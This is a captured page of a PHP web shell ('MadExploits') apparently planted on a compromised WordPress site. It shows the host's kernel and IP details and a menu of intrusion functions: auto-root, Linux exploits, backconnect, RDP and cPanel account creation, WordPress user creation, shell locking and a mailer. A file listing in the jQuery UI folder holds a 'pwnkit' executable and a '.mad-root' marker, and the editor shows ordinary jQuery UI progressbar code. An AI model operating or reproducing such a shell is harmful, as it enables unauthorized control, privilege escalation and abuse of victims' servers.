Linux webm001.cluster111.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.111.20.1 | : 216.73.216.115
Cant Read [ /etc/named.conf ]
7.4.33
osteocoeek
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
osteocoeek /
www /
ALL /
wp-includes /
js /
jquery /
ui /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
accordion.min.js
8.37
KB
-rw-r--r--
autocomplete.min.js
8.04
KB
-rw-r--r--
button.min.js
7.05
KB
-rw-r--r--
core.min.js
3.84
KB
-rw-r--r--
datepicker.min.js
35.53
KB
-rw-r--r--
dialog.min.js
11.81
KB
-rw-r--r--
draggable.min.js
18.41
KB
-rw-r--r--
droppable.min.js
6.1
KB
-rw-r--r--
effect-blind.min.js
1.1
KB
-rw-r--r--
effect-bounce.min.js
1.21
KB
-rw-r--r--
effect-clip.min.js
912
B
-rw-r--r--
effect-drop.min.js
993
B
-rw-r--r--
effect-explode.min.js
1.14
KB
-rw-r--r--
effect-fade.min.js
515
B
-rw-r--r--
effect-fold.min.js
1
KB
-rw-r--r--
effect-highlight.min.js
789
B
-rw-r--r--
effect-puff.min.js
783
B
-rw-r--r--
effect-pulsate.min.js
798
B
-rw-r--r--
effect-scale.min.js
1.08
KB
-rw-r--r--
effect-shake.min.js
1.08
KB
-rw-r--r--
effect-size.min.js
3.18
KB
-rw-r--r--
effect-slide.min.js
961
B
-rw-r--r--
effect-transfer.min.js
857
B
-rw-r--r--
effect.min.js
12.96
KB
-rw-r--r--
menu.min.js
9.33
KB
-rw-r--r--
mouse.min.js
3.07
KB
-rw-r--r--
position.min.js
6.33
KB
-rw-r--r--
progressbar.min.js
2.41
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
resizable.min.js
17.97
KB
-rw-r--r--
selectable.min.js
4.16
KB
-rw-r--r--
selectmenu.min.js
8.17
KB
-rw-r--r--
slider.min.js
10.67
KB
-rw-r--r--
sortable.min.js
24.31
KB
-rw-r--r--
spinner.min.js
6.9
KB
-rw-r--r--
tabs.min.js
11.75
KB
-rw-r--r--
tooltip.min.js
5.53
KB
-rw-r--r--
widget.min.js
6.68
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : progressbar.min.js
/*! * jQuery UI Progressbar 1.11.4 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license * * http://api.jqueryui.com/progressbar/ */ !function(e){"function"==typeof define&&define.amd?define(["jquery","./core","./widget"],e):e(jQuery)}(function(t){return t.widget("ui.progressbar",{version:"1.11.4",options:{max:100,value:0,change:null,complete:null},min:0,_create:function(){this.oldValue=this.options.value=this._constrainedValue(),this.element.addClass("ui-progressbar ui-widget ui-widget-content ui-corner-all").attr({role:"progressbar","aria-valuemin":this.min}),this.valueDiv=t("<div class='ui-progressbar-value ui-widget-header ui-corner-left'></div>").appendTo(this.element),this._refreshValue()},_destroy:function(){this.element.removeClass("ui-progressbar ui-widget ui-widget-content ui-corner-all").removeAttr("role").removeAttr("aria-valuemin").removeAttr("aria-valuemax").removeAttr("aria-valuenow"),this.valueDiv.remove()},value:function(e){if(void 0===e)return this.options.value;this.options.value=this._constrainedValue(e),this._refreshValue()},_constrainedValue:function(e){return void 0===e&&(e=this.options.value),this.indeterminate=!1===e,"number"!=typeof e&&(e=0),!this.indeterminate&&Math.min(this.options.max,Math.max(this.min,e))},_setOptions:function(e){var i=e.value;delete e.value,this._super(e),this.options.value=this._constrainedValue(i),this._refreshValue()},_setOption:function(e,i){"max"===e&&(i=Math.max(this.min,i)),"disabled"===e&&this.element.toggleClass("ui-state-disabled",!!i).attr("aria-disabled",i),this._super(e,i)},_percentage:function(){return this.indeterminate?100:100*(this.options.value-this.min)/(this.options.max-this.min)},_refreshValue:function(){var e=this.options.value,i=this._percentage();this.valueDiv.toggle(this.indeterminate||e>this.min).toggleClass("ui-corner-right",e===this.options.max).width(i.toFixed(0)+"%"),this.element.toggleClass("ui-progressbar-indeterminate",this.indeterminate),this.indeterminate?(this.element.removeAttr("aria-valuenow"),this.overlayDiv||(this.overlayDiv=t("<div class='ui-progressbar-overlay'></div>").appendTo(this.valueDiv))):(this.element.attr({"aria-valuemax":this.options.max,"aria-valuenow":e}),this.overlayDiv&&(this.overlayDiv.remove(),this.overlayDiv=null)),this.oldValue!==e&&(this.oldValue=e,this._trigger("change")),e===this.options.max&&this._trigger("complete")}})});
Close